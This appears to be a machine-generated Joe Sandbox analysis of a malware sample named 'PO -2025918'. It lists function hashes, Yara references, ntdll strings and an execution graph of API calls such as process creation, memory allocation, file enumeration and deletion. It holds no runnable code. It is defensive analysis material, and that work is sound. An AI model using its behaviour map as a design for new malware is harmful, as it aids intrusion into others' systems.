                                                                                                                            • Instruction ID: f32730119f8fa020a414d69a10e92346093b942cfbbb41ba1fe6b57066280f2b
                                                                                                                            • Opcode Fuzzy Hash: 601b90678ddbfc0a1179b2d0b7e6539fdf8dbfc5bdd39b2e8ff79c7d75f0cc1f
                                                                                                                            • Instruction Fuzzy Hash: 0690023220280142954472585808A4E414597E1302B95E455A0015555CCB1889615321
                                                                                                                            Function 01BD3D70 Relevance: .0, Instructions: 4COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 584f6d593e2700a937c8d4eb6fb9dd763df71e7487eb32e323306a9f088c7b51
                                                                                                                            • Instruction ID: 6edc7152ccb573d757ae7fe33086d67b315a82f7f2879f941c7d8bded29e4a77
                                                                                                                            • Opcode Fuzzy Hash: 584f6d593e2700a937c8d4eb6fb9dd763df71e7487eb32e323306a9f088c7b51
                                                                                                                            • Instruction Fuzzy Hash: C890023620180402D51471585808646008697D0301F55E451A0424559DC75889A1A221
                                                                                                                            Function 0040AD20 Relevance: .0, Instructions: 3COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_400000_PO -2025918.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b321c98d22beb57292bd23e2afca9873836200869944c03403241b01ebef6b2e
                                                                                                                            • Instruction ID: c08db954ce700782ac5ec97d103e544f6dd908508358fbafc631fab0ef8ddf2f
                                                                                                                            • Opcode Fuzzy Hash: b321c98d22beb57292bd23e2afca9873836200869944c03403241b01ebef6b2e
                                                                                                                            • Instruction Fuzzy Hash: 9BA00271408604DAF6194AA0C105068F3F1AE1130AF2004AED891574509B3A1432DB47
                                                                                                                            Function 01BD2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                            • Instruction ID: 4b884f187b05bd5d6fb54025b6e14cb2497e8c81fe01c45e10ec57a7db71a853
                                                                                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                            Function 01BD2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                            • Opcode ID: d44cc9879117c5a48e6b7c3dce08eabf7ecfd6a2ce84b6fd57c815e907f56ca7
                                                                                                                            • Instruction ID: 0dca17b606f3f79ae595359aa5126ef997c4efb90a1e7636a1b1dbbe8ded8497
                                                                                                                            • Opcode Fuzzy Hash: d44cc9879117c5a48e6b7c3dce08eabf7ecfd6a2ce84b6fd57c815e907f56ca7
                                                                                                                            • Instruction Fuzzy Hash: A051E5B6A04256BECF2DDB9CC89097EFBB8FF0824071082E9E455D3641E375DE5087A0
                                                                                                                            Function 01C42410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                            • Opcode ID: 840dd0f84a2493957aed321893d66f0d97a01c105a2950c5c1ecd11c2dcd3460
                                                                                                                            • Instruction ID: ea3b661cb213a1e018c2c575f722d46b0c78e9a4a401c9630a31d23985ffbd03
                                                                                                                            • Opcode Fuzzy Hash: 840dd0f84a2493957aed321893d66f0d97a01c105a2950c5c1ecd11c2dcd3460
                                                                                                                            • Instruction Fuzzy Hash: 4351F275A08646EFCB34DE9DD89197EBBF8EF44200B048499F496D7642E7B4EA40C7A0
                                                                                                                            Function 01BC7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01C046FC
                                                                                                                            • ExecuteOptions, xrefs: 01C046A0
                                                                                                                            • Execute=1, xrefs: 01C04713
                                                                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01C04655
                                                                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 01C04787
                                                                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01C04725
                                                                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01C04742
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                            • API String ID: 0-484625025
                                                                                                                            • Opcode ID: e5dfe48ed202b68aa5921df0a4a052974fe258e30a88384cd28449c3e48a4373
                                                                                                                            • Instruction ID: 75634d7bb459e90206cf5ce96e5db3a429c0f8fc304d7c8d3fa0e62cd5ecdcc6
                                                                                                                            • Opcode Fuzzy Hash: e5dfe48ed202b68aa5921df0a4a052974fe258e30a88384cd28449c3e48a4373
                                                                                                                            • Instruction Fuzzy Hash: BD51FD31600219AAEF19ABA9DC89FAE77A8EF14700F0401EDE605971D1EF71DA45CF60
                                                                                                                            Function 01C66940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                            • Instruction ID: 69df58776001aca9a162c095d56ae105565dda50e04ba163b87cd308d9b8c171
                                                                                                                            • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                            • Instruction Fuzzy Hash: DD020471508342EFD709CF19C894A6BBBE9EFC8714F048A6DF9858B264DB31E945CB42
                                                                                                                            Function 01BDB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __aulldvrm
                                                                                                                            • String ID: +$-$0$0
                                                                                                                            • API String ID: 1302938615-699404926
                                                                                                                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                            • Instruction ID: f4080b83070cd3d4173a04a9354a3720676537044aac3c90e6d15cad7638b54b
                                                                                                                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                            • Instruction Fuzzy Hash: CE81E330E052498FEF2D8E6CC6517FEBBB1EF46350F1A4299E861A7281E7318840C751
                                                                                                                            Function 01C420E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: %%%u$[$]:%u
                                                                                                                            • API String ID: 48624451-2819853543
                                                                                                                            • Opcode ID: 22aec9cc9ef17a4bcb89805e9e626a00472d558b622539ffc29272e231ef783f
                                                                                                                            • Instruction ID: aa8e817243ecf9c41836d681f021941cbd01d9aeb6fcef91d3228f5386ed9ded
                                                                                                                            • Opcode Fuzzy Hash: 22aec9cc9ef17a4bcb89805e9e626a00472d558b622539ffc29272e231ef783f
                                                                                                                            • Instruction Fuzzy Hash: BE21657AA00119ABDB14EFB9DC45AEFBBF8EF54650F040156F905E3201E730DA01DBA1
                                                                                                                            Function 01BBF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01C002E7
                                                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01C002BD
                                                                                                                            • RTL: Re-Waiting, xrefs: 01C0031E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                            • API String ID: 0-2474120054
                                                                                                                            • Opcode ID: 641f81be180456ed35966e798d763c487f61b4d1309798614125f12a42b4f0c0
                                                                                                                            • Instruction ID: 8792d20a0f856d3d3640398b3138c2e5e3ad826a50599f190ba8cb7af89f71f6
                                                                                                                            • Opcode Fuzzy Hash: 641f81be180456ed35966e798d763c487f61b4d1309798614125f12a42b4f0c0
                                                                                                                            • Instruction Fuzzy Hash: 33E1AB30608741DFD72ACF28C884B7ABBE0EB84754F140AADF5A58B6E1D7B4D954CB42
                                                                                                                            Function 01BCBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01C07B7F
                                                                                                                            • RTL: Re-Waiting, xrefs: 01C07BAC
                                                                                                                            • RTL: Resource at %p, xrefs: 01C07B8E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                            • API String ID: 0-871070163
                                                                                                                            • Opcode ID: db0e6ed57a5f985cb4f8b001efe615c5d9916a4b872c8461561adefda5f0a173
                                                                                                                            • Instruction ID: 1d5a336f07c7f2ced2e7416f577a3ee5950183d74fc19f45281e2917069125bc
                                                                                                                            • Opcode Fuzzy Hash: db0e6ed57a5f985cb4f8b001efe615c5d9916a4b872c8461561adefda5f0a173
                                                                                                                            • Instruction Fuzzy Hash: C041E2317007039FDB29DE29C941B6AB7E5EF98B10F000A5DF99ADB780DB31E9058B91
                                                                                                                            Function 01BCB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01C0728C
                                                                                                                            Strings
                                                                                                                            • RTL: Re-Waiting, xrefs: 01C072C1
                                                                                                                            • RTL: Resource at %p, xrefs: 01C072A3
                                                                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01C07294
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                            • API String ID: 885266447-605551621
                                                                                                                            • Opcode ID: 1da7fd2245f912745769e85877d19cb86ade326eff53cb5c4b71fc8d9aa57ce7
                                                                                                                            • Instruction ID: f58cec4279d9e8673694c00f747ec291c01a66542538b69789c2d534dc6db328
                                                                                                                            • Opcode Fuzzy Hash: 1da7fd2245f912745769e85877d19cb86ade326eff53cb5c4b71fc8d9aa57ce7
                                                                                                                            • Instruction Fuzzy Hash: 18411031604316EBCB2ACE29CD42B6AB7A5FF54B50F10065CF995EB280DB30F9528BD1
                                                                                                                            Function 01C42300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: %%%u$]:%u
                                                                                                                            • API String ID: 48624451-3050659472
                                                                                                                            • Opcode ID: d60d175b21f6aea2a42135dbecdb1dce0159f2e76b44a33d7f97621298e4351e
                                                                                                                            • Instruction ID: 3909b625cf8b7f4d600b32f24bfa61ba2588c142ab49274e3853e4d0a03b099f
                                                                                                                            • Opcode Fuzzy Hash: d60d175b21f6aea2a42135dbecdb1dce0159f2e76b44a33d7f97621298e4351e
                                                                                                                            • Instruction Fuzzy Hash: 6C314372A00619DFDB24DF29DC45BAEB7FCEB54A10F444595F949E3240EB30DA449BA0
                                                                                                                            Function 01BD7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __aulldvrm
                                                                                                                            • String ID: +$-
                                                                                                                            • API String ID: 1302938615-2137968064
                                                                                                                            • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                            • Instruction ID: 13c80cd8bf618db62c6de1d39e11ac51952cd687b2206fb15e2dcf25037c7659
                                                                                                                            • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                            • Instruction Fuzzy Hash: 89919271E002569BEF2CDF6DC8816FEBBA5EF44328F5446DAE955A72C0FB3089408751
                                                                                                                            Function 01B99126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $$@
                                                                                                                            • API String ID: 0-1194432280
                                                                                                                            • Opcode ID: c248c09e9f2d37f704eb2bf4579f47bcf2f2b0e4fe5b8760f2809a06cda19198
                                                                                                                            • Instruction ID: 6bec670074b0f7b05351465e8fdaba88e7c2d7cfdd6b5058f135dd94741c831c
                                                                                                                            • Opcode Fuzzy Hash: c248c09e9f2d37f704eb2bf4579f47bcf2f2b0e4fe5b8760f2809a06cda19198
                                                                                                                            • Instruction Fuzzy Hash: B7810C71D00269ABDF39DF54CC44BEEB7B4AB48714F0041EAAA1AB7640D7709E85CFA0

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:2.6%
                                                                                                                            Dynamic/Decrypted Code Coverage:3.7%
                                                                                                                            Signature Coverage:1.4%
                                                                                                                            Total number of Nodes:510
                                                                                                                            Total number of Limit Nodes:76
                                                                                                                            execution_graph 98667 aa87ea 98668 aa87ef 98667->98668 98671 aa87db 98667->98671 98669 aa882b 98668->98669 98673 ab54c0 98668->98673 98669->98671 98678 aa70b0 98669->98678 98674 ab5524 98673->98674 98675 ab555b 98674->98675 98687 ab1840 98674->98687 98675->98669 98677 ab553d 98677->98669 98679 aa711e 98678->98679 98680 aa70c6 98678->98680 98679->98671 98681 ab54c0 2 API calls 98680->98681 98682 aa70d8 98681->98682 98682->98679 98702 aa6f20 LdrLoadDll LdrLoadDll 98682->98702 98684 aa70ff 98684->98679 98685 ab54c0 2 API calls 98684->98685 98686 aa7115 98685->98686 98686->98671 98688 ab17dc 98687->98688 98689 ab17f8 98688->98689 98690 ab17e4 98688->98690 98696 ab1885 98688->98696 98698 ab94d0 98689->98698 98692 ab94d0 NtClose 98690->98692 98694 ab17ed 98692->98694 98693 ab1801 98701 abb690 RtlAllocateHeap 98693->98701 98694->98677 98696->98677 98697 ab180c 98697->98677 98699 ab94ed 98698->98699 98700 ab94fe NtClose 98699->98700 98700->98693 98701->98697 98702->98684 98703 aaf860 98704 aaf8c4 98703->98704 98732 aa62c0 98704->98732 98706 aaf9fe 98707 aaf9f7 98707->98706 98739 aa63d0 98707->98739 98709 aafa7a 98710 aafbb2 98709->98710 98729 aafba3 98709->98729 98743 aaf640 98709->98743 98711 ab94d0 NtClose 98710->98711 98713 aafbbc 98711->98713 98714 aafab6 98714->98710 98715 aafac1 98714->98715 98752 abb650 98715->98752 98717 aafaea 98718 aafb09 98717->98718 98719 aafaf3 98717->98719 98755 aaf530 CoInitialize 98718->98755 98720 ab94d0 NtClose 98719->98720 98722 aafafd 98720->98722 98723 aafb17 98758 ab8f90 98723->98758 98725 aafb92 98726 ab94d0 NtClose 98725->98726 98727 aafb9c 98726->98727 98762 abb570 98727->98762 98730 aafb35 98730->98725 98731 ab8f90 LdrInitializeThunk 98730->98731 98731->98730 98733 aa62f3 98732->98733 98734 aa6314 98733->98734 98765 ab9030 98733->98765 98734->98707 98736 aa6337 98736->98734 98737 ab94d0 NtClose 98736->98737 98738 aa63b7 98737->98738 98738->98707 98740 aa63f5 98739->98740 98770 ab8e30 98740->98770 98744 aaf65c 98743->98744 98775 aa4570 98744->98775 98746 aaf683 98746->98714 98747 aaf67a 98747->98746 98748 aa4570 2 API calls 98747->98748 98749 aaf74e 98748->98749 98750 aa4570 2 API calls 98749->98750 98751 aaf7ab 98749->98751 98750->98751 98751->98714 98783 ab9800 98752->98783 98754 abb66b 98754->98717 98757 aaf595 98755->98757 98756 aaf62b CoUninitialize 98756->98723 98757->98756 98759 ab8faa 98758->98759 98786 3302ba0 LdrInitializeThunk 98759->98786 98760 ab8fda 98760->98730 98787 ab9850 98762->98787 98764 abb589 98764->98729 98766 ab904d 98765->98766 98769 3302ca0 LdrInitializeThunk 98766->98769 98767 ab9079 98767->98736 98769->98767 98771 ab8e4a 98770->98771 98774 3302c60 LdrInitializeThunk 98771->98774 98772 aa6469 98772->98709 98774->98772 98777 aa4594 98775->98777 98776 aa459b 98776->98747 98777->98776 98779 aa45ba 98777->98779 98782 abc9f0 LdrLoadDll 98777->98782 98780 aa45e7 98779->98780 98781 aa45de LdrLoadDll 98779->98781 98780->98747 98781->98780 98782->98779 98784 ab981a 98783->98784 98785 ab982b RtlAllocateHeap 98784->98785 98785->98754 98786->98760 98788 ab986a 98787->98788 98789 ab987b RtlFreeHeap 98788->98789 98789->98764 98795 ab0160 98796 ab017d 98795->98796 98797 aa4570 2 API calls 98796->98797 98798 ab019b 98797->98798 98801 a99db0 98803 a99dbf 98801->98803 98802 a99e00 98803->98802 98804 a99ded CreateThread 98803->98804 98805 aa22b0 98806 aa22e6 98805->98806 98810 ab8b20 98805->98810 98814 ab9570 98806->98814 98809 aa22fb 98811 ab8b3d 98810->98811 98819 3302c0a 98811->98819 98812 ab8b69 98812->98806 98815 ab95fc 98814->98815 98817 ab959b 98814->98817 98822 3302e80 LdrInitializeThunk 98815->98822 98816 ab962d 98816->98809 98817->98809 98820 3302c11 98819->98820 98821 3302c1f LdrInitializeThunk 98819->98821 98820->98812 98821->98812 98822->98816 98823 aa5bb0 98824 aa5be0 98823->98824 98828 aa8100 98823->98828 98827 aa5c0c 98824->98827 98832 aa8080 98824->98832 98829 aa8113 98828->98829 98839 ab8a20 98829->98839 98831 aa813e 98831->98824 98833 aa80c4 98832->98833 98838 aa80e5 98833->98838 98845 ab87f0 98833->98845 98835 aa80d5 98836 aa80f1 98835->98836 98837 ab94d0 NtClose 98835->98837 98836->98824 98837->98838 98838->98824 98840 ab8a9e 98839->98840 98841 ab8a4e 98839->98841 98844 3302dd0 LdrInitializeThunk 98840->98844 98841->98831 98842 ab8ac3 98842->98831 98844->98842 98846 ab886d 98845->98846 98848 ab881e 98845->98848 98850 3304650 LdrInitializeThunk 98846->98850 98847 ab8892 98847->98835 98848->98835 98850->98847 98856 ab9430 98857 ab94a4 98856->98857 98859 ab945b 98856->98859 98858 ab94ba NtDeleteFile 98857->98858 98865 ab1b30 98866 ab1b49 98865->98866 98867 ab54c0 2 API calls 98866->98867 98872 ab1b66 98867->98872 98868 ab1bd9 98869 ab1b94 98870 abb570 RtlFreeHeap 98869->98870 98871 ab1ba4 98870->98871 98872->98868 98872->98869 98873 ab1bd4 98872->98873 98874 abb570 RtlFreeHeap 98873->98874 98874->98868 98875 3302ad0 LdrInitializeThunk 98876 aa2788 98877 aa62c0 2 API calls 98876->98877 98878 aa27b3 98877->98878 98879 aa9c0f 98880 aa9c1f 98879->98880 98881 abb570 RtlFreeHeap 98880->98881 98882 aa9c26 98880->98882 98881->98882 98883 aa7302 98884 aa72c0 98883->98884 98885 aa7306 98883->98885 98892 aa6720 98884->98892 98889 aa7382 98885->98889 98914 aab290 98885->98914 98888 aa72ce 98890 aa72f3 98888->98890 98891 ab54c0 2 API calls 98888->98891 98891->98890 98893 aa6745 98892->98893 98894 aa62c0 2 API calls 98893->98894 98896 aa6775 98893->98896 98894->98896 98895 aa6a11 98895->98888 98896->98895 98898 aa63d0 LdrInitializeThunk 98896->98898 98903 aa6978 98896->98903 98897 aa63d0 LdrInitializeThunk 98904 aa69c6 98897->98904 98899 aa68a1 98898->98899 98900 aa68ac 98899->98900 98899->98903 98901 ab94d0 NtClose 98900->98901 98905 aa68b6 98901->98905 98902 ab94d0 NtClose 98902->98895 98903->98897 98904->98902 98906 aa63d0 LdrInitializeThunk 98905->98906 98907 aa6901 98906->98907 98908 ab94d0 NtClose 98907->98908 98909 aa690b 98908->98909 98910 aa63d0 LdrInitializeThunk 98909->98910 98911 aa6956 98910->98911 98912 ab94d0 NtClose 98911->98912 98913 aa6970 98912->98913 98913->98888 98915 aab2b6 98914->98915 98916 aab4e6 98915->98916 98941 ab98e0 98915->98941 98916->98889 98918 aab332 98918->98916 98944 abc740 98918->98944 98920 aab34e 98920->98916 98921 aab422 98920->98921 98922 ab8b20 LdrInitializeThunk 98920->98922 98923 aa5b30 LdrInitializeThunk 98921->98923 98925 aab441 98921->98925 98924 aab3b0 98922->98924 98923->98925 98924->98921 98927 aab3b9 98924->98927 98940 aab4ce 98925->98940 98954 ab8690 98925->98954 98926 aa8100 LdrInitializeThunk 98930 aab418 98926->98930 98927->98916 98928 aab3eb 98927->98928 98934 aab40a 98927->98934 98950 aa5b30 98927->98950 98969 ab47a0 LdrInitializeThunk 98928->98969 98930->98889 98931 aa8100 LdrInitializeThunk 98935 aab4dc 98931->98935 98934->98926 98935->98889 98936 aab4a5 98959 ab8740 98936->98959 98938 aab4bf 98964 ab88a0 98938->98964 98940->98931 98942 ab98fd 98941->98942 98943 ab990e CreateProcessInternalW 98942->98943 98943->98918 98945 abc6b0 98944->98945 98946 abc70d 98945->98946 98947 abb650 RtlAllocateHeap 98945->98947 98946->98920 98948 abc6ea 98947->98948 98949 abb570 RtlFreeHeap 98948->98949 98949->98946 98951 aa5b4f 98950->98951 98970 ab8cf0 98951->98970 98953 aa5b6e 98953->98928 98955 ab86bb 98954->98955 98956 ab870a 98954->98956 98955->98936 98976 33039b0 LdrInitializeThunk 98956->98976 98957 ab872f 98957->98936 98960 ab87ba 98959->98960 98962 ab876b 98959->98962 98977 3304340 LdrInitializeThunk 98960->98977 98961 ab87df 98961->98938 98962->98938 98965 ab891d 98964->98965 98966 ab88ce 98964->98966 98978 3302fb0 LdrInitializeThunk 98965->98978 98966->98940 98967 ab8942 98967->98940 98969->98934 98971 ab8d1e 98970->98971 98972 ab8d9d 98970->98972 98971->98953 98975 3302d10 LdrInitializeThunk 98972->98975 98973 ab8de2 98973->98953 98975->98973 98976->98957 98977->98961 98978->98967 98979 a9b500 98981 a9cb71 98979->98981 98982 abb4f0 98979->98982 98985 ab9640 98982->98985 98984 abb51e 98984->98981 98986 ab96d5 98985->98986 98988 ab966e 98985->98988 98987 ab96eb NtAllocateVirtualMemory 98986->98987 98987->98984 98988->98984 98989 aac600 98991 aac629 98989->98991 98990 aac72d 98991->98990 98992 aac6d3 FindFirstFileW 98991->98992 98992->98990 98996 aac6ee 98992->98996 98993 aac714 FindNextFileW 98995 aac726 FindClose 98993->98995 98993->98996 98995->98990 98996->98993 98997 aac4f0 NtClose RtlAllocateHeap 98996->98997 98997->98996 98998 aa0dc0 98999 aa0dda 98998->98999 99000 aa4570 2 API calls 98999->99000 99001 aa0df8 99000->99001 99002 aa0e3d 99001->99002 99003 aa0e2c PostThreadMessageW 99001->99003 99003->99002 99004 ab9340 99005 ab93e7 99004->99005 99007 ab936e 99004->99007 99006 ab93fd NtReadFile 99005->99006 99008 a99e10 99009 a99fce 99008->99009 99011 a9a217 99009->99011 99012 abb1e0 99009->99012 99013 abb206 99012->99013 99018 a94070 99013->99018 99015 abb212 99016 abb24b 99015->99016 99021 ab5620 99015->99021 99016->99011 99020 a9407d 99018->99020 99025 aa3220 99018->99025 99020->99015 99022 ab5682 99021->99022 99024 ab568f 99022->99024 99038 aa1a00 99022->99038 99024->99016 99026 aa3237 